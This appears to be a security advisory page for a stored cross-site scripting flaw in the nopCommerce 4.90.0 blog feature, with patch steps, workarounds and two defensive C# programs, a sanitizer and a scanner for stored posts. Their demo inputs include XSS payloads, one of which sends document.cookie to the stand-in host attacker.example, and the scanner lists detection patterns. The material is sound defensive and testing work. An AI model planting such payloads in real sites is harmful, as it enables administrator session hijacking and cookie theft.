CVE-2025-65590

5.4 MEDIUM

📋 TL;DR

nopCommerce 4.90.0 contains a stored cross-site scripting (XSS) vulnerability in the blog post functionality of its content management area. A user who can create or edit blog posts can store script inside a post, and that script runs in the browser of an administrator who later views the post, which can compromise the administrative session. All nopCommerce 4.90.0 installations with the blog enabled are affected.

💻 Affected Systems

Products:
  • nopCommerce
Versions: 4.90.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects installations with blog functionality enabled in the content management area.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Administrator account takeover leading to full e-commerce site compromise, data theft, and malware distribution to customers.

🟠 Likely Case

Hijacking of an administrator's session, defacement of blog content, or credential theft.

🟢 If Mitigated

Limited to blog content defacement when post creation and editing are restricted to trusted staff, a Content Security Policy blocks inline script in the admin area, and admin session cookies are HttpOnly and short-lived. Strong login authentication on its own does not help: the injected script runs inside an already authenticated administrator session.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account that can create or edit blog posts, i.e. an admin-area account whose customer role holds the blog-management permission in the access control list (nopCommerce has no separate "contributor" role). The victim is any administrator who opens the poisoned post.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.90.1 or later

Vendor Advisory: https://www.nopcommerce.com/

Restart Required: No

Instructions:

1. Back up the nopCommerce installation and its database.
2. Download nopCommerce 4.90.1 or later from the official website.
3. Deploy the patched release over the affected files.
4. Clear the application cache.
5. Test blog functionality, including creating and viewing a post in the admin area.

🔧 Temporary Workarounds

Disable Blog Functionality

Applies to: all platforms

Temporarily disable the blog module to prevent exploitation while waiting to patch.

The blog is a core nopCommerce feature, not a plugin, so it does not appear under Local plugins. Go to Admin > Configuration > Settings > Blog settings and clear 'Blog enabled'. This removes the public blog pages only; existing posts stay in the database and remain editable in the admin area, so also review stored posts for injected markup before staff open them.

Input Validation Filter

Applies to: all platforms

Implement server-side sanitization of blog post content so that only an allowlist of harmless HTML tags and attributes is stored. Do not just strip script tags: event-handler attributes (onerror, onload, ...) and javascript: URLs execute as well.

Modify the blog post handling code to sanitize HTML input with an allowlist sanitizer such as HtmlSanitizer (the Ganss.Xss NuGet package). The older Microsoft AntiXSS library is no longer maintained and should not be chosen for new code.
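The allowlist approach described above, as an added example that is not nopCommerce project code: it builds a sanitizer on the HtmlSanitizer NuGet package and shows what happens to the payload types this page is concerned with. The BlogBodySanitizer class, its tag and attribute lists, and the suggested call site are assumptions; the namespace is Ganss.Xss in HtmlSanitizer 8.x (Ganss.XSS in older releases).

```csharp
// Added example, not nopCommerce project code. Assumes the HtmlSanitizer NuGet
// package (namespace Ganss.Xss in v8+, Ganss.XSS before that). Class name,
// allowlists and call site are assumptions for illustration.
using System;
using Ganss.Xss;

public static class BlogBodySanitizer
{
    // Tags a blog author legitimately needs. Anything else (script, iframe, object,
    // embed, svg, form, style, ...) is removed together with its content.
    private static readonly string[] AllowedTags =
    {
        "p", "br", "div", "span", "strong", "em", "b", "i", "u", "s", "blockquote",
        "pre", "code", "ul", "ol", "li", "h2", "h3", "h4", "a", "img", "hr",
        "table", "thead", "tbody", "tr", "th", "td"
    };

    // No style attribute and no on* event handlers: they are absent from this
    // list, so the sanitizer drops them.
    private static readonly string[] AllowedAttributes =
    {
        "href", "src", "alt", "title", "target", "rel"
    };

    private static readonly HtmlSanitizer Sanitizer = Build();

    private static HtmlSanitizer Build()
    {
        var s = new HtmlSanitizer();
        s.AllowedTags.Clear();
        s.AllowedTags.UnionWith(AllowedTags);
        s.AllowedAttributes.Clear();
        s.AllowedAttributes.UnionWith(AllowedAttributes);
        // href/src may only use these schemes; javascript: and data: URLs are stripped.
        s.AllowedSchemes.Clear();
        s.AllowedSchemes.UnionWith(new[] { "http", "https", "mailto" });
        // Inline CSS is dropped entirely rather than filtered property by property.
        s.AllowedCssProperties.Clear();
        return s;
    }

    // Call this on the post body and overview before the post is saved. In
    // nopCommerce that would be the admin BlogController Create/Edit actions
    // (assumed; verify against your installed version).
    public static string Sanitize(string html) =>
        string.IsNullOrEmpty(html) ? string.Empty : Sanitizer.Sanitize(html);
}

public static class Demo
{
    public static void Main()
    {
        // Constructed inputs of the kinds this advisory describes.
        string[] samples =
        {
            "<p>Hello</p><script>alert('XSS')</script>",
            "<img src=\"x\" onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">",
            "<a href=\"javascript:alert(1)\">click me</a>",
            "<p>Legitimate <strong>post</strong> with a <a href=\"https://example.com/\">link</a></p>"
        };
        foreach (var sample in samples)
        {
            Console.WriteLine(sample);
            Console.WriteLine("  -> " + BlogBodySanitizer.Sanitize(sample));
        }
    }
}
```

Sanitizing on input is what protects the admin views this advisory is about; not rendering stored bodies as raw HTML unless they have passed through the sanitizer is the second layer. Run the sanitizer once over existing posts as well, because payloads stored before the change are still in the database.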

🧯 If You Can't Patch

  • Restrict blog post creation and editing to trusted administrators only by removing the blog-management permission from every other customer role (Admin > Configuration > Access control list).
  • Deploy a Content Security Policy for the admin area that blocks inline and off-site script. Start in report-only mode: the nopCommerce admin pages rely on inline scripts, so a strict policy needs nonces or it will break the UI.

🔍 How to Verify

Check if Vulnerable:

Confirm that the nopCommerce version is 4.90.0 and the blog is enabled. On a staging copy, create a blog post whose body contains <script>alert('XSS')</script> and open it in the admin area; if the alert fires, or the page source shows the tag unencoded, the instance is vulnerable. Also try an event-handler payload such as <img src=x onerror=alert(1)>, since a fix that only removes script tags is incomplete.

Check Version:

Check Admin > System > System information > nopCommerce version (the version is also shown in the admin page footer).

Verify Fix Applied:

After patching, repeat the same payloads. The stored post must render with the markup encoded or removed, and the page source must not contain an unencoded script tag, event-handler attribute, or javascript: URL.

📡 Detection & Monitoring

Log Indicators:

  • Blog posts created or edited by accounts that do not normally author content, or at unusual times. nopCommerce records post creation and edits in its activity log (Admin > Customers > Activity log), which identifies the actor and the post but not the body, so the content itself must be checked in the database.
  • Administrative session anomalies after a blog post was viewed, such as admin actions from a new IP address or user agent shortly afterwards.

Network Indicators:

  • Admin browsers loading scripts from, or sending requests to, hosts that are not the store or its known CDNs immediately after a blog admin page was requested.
  • Suspicious outbound connections from administrative sessions.

SIEM Query:

source="nopcommerce" AND (event="blog_post_created" OR event="blog_post_modified") AND content CONTAINS "<script>"

This query is illustrative: nopCommerce does not emit these event names itself, so map them to the activity log entries or web server logs that are actually shipped, and widen the content match beyond "<script>" to on*= attributes, javascript: URLs and iframe/object/svg tags, which execute just as well.
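The content check behind that query, as an added example rather than nopCommerce project code: a scanner over exported blog post rows that flags the markup patterns an attacker would store. The BlogPostRecord shape mirrors the Id, Title, Body and BodyOverview columns assumed for the nopCommerce BlogPost table, and the rows are constructed here so the program runs offline.

```csharp
// Added example, not nopCommerce project code. The record shape assumes the
// BlogPost table's Id, Title, Body and BodyOverview columns; the rows in Main
// are constructed for the demonstration.
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

public sealed record BlogPostRecord(int Id, string Title, string Body, string BodyOverview);

public sealed record Finding(int PostId, string Field, string Pattern, string Snippet);

public static class BlogPostScanner
{
    // Each pattern is a distinct route to script execution from stored HTML.
    // Matching "<script>" alone misses the other five.
    private static readonly (string Name, Regex Re)[] Patterns =
    {
        ("script-tag",     new Regex(@"<\s*script\b", RegexOptions.IgnoreCase)),
        ("event-handler",  new Regex(@"\s+on[a-z]+\s*=", RegexOptions.IgnoreCase)),
        ("javascript-url", new Regex(@"(href|src|action|formaction)\s*=\s*[""']?\s*javascript:", RegexOptions.IgnoreCase)),
        ("data-html-url",  new Regex(@"data:\s*text/html", RegexOptions.IgnoreCase)),
        ("embedding-tag",  new Regex(@"<\s*(iframe|object|embed|svg|math|base)\b", RegexOptions.IgnoreCase)),
        ("srcdoc",         new Regex(@"\bsrcdoc\s*=", RegexOptions.IgnoreCase)),
    };

    public static List<Finding> Scan(IEnumerable<BlogPostRecord> posts)
    {
        var findings = new List<Finding>();
        foreach (var post in posts)
        {
            Check(post.Id, "Body", post.Body, findings);
            Check(post.Id, "BodyOverview", post.BodyOverview, findings);
        }
        return findings;
    }

    private static void Check(int id, string field, string html, List<Finding> findings)
    {
        if (string.IsNullOrEmpty(html)) return;
        foreach (var (name, re) in Patterns)
        {
            Match m = re.Match(html);
            if (!m.Success) continue;
            // Keep some context so a reviewer can judge the hit without opening the post.
            int start = Math.Max(0, m.Index - 20);
            int length = Math.Min(html.Length - start, m.Length + 60);
            findings.Add(new Finding(id, field, name, html.Substring(start, length)));
        }
    }
}

public static class Demo
{
    public static void Main()
    {
        // Constructed rows: one clean post and two carrying payloads of the kind described above.
        var posts = new[]
        {
            new BlogPostRecord(1, "Spring sale", "<p>Everything 20% off.</p>", "<p>Sale!</p>"),
            new BlogPostRecord(2, "New arrivals", "<p>Hi</p><script>alert('XSS')</script>", ""),
            new BlogPostRecord(3, "Shipping update",
                "<img src=\"x\" onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
                "<a href=\"javascript:alert(1)\">details</a>")
        };

        foreach (var f in BlogPostScanner.Scan(posts))
            Console.WriteLine($"post {f.PostId} {f.Field}: {f.Pattern}  ...{f.Snippet}...");
    }
}
```

For a first cut against a live database, the same substrings as LIKE conditions on the Body and BodyOverview columns of the BlogPost table (table and column names assumed) will do; the regex pass above is stricter about attribute context. Review every hit by hand, since a post that legitimately displays HTML examples will trigger it.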

🔗 References
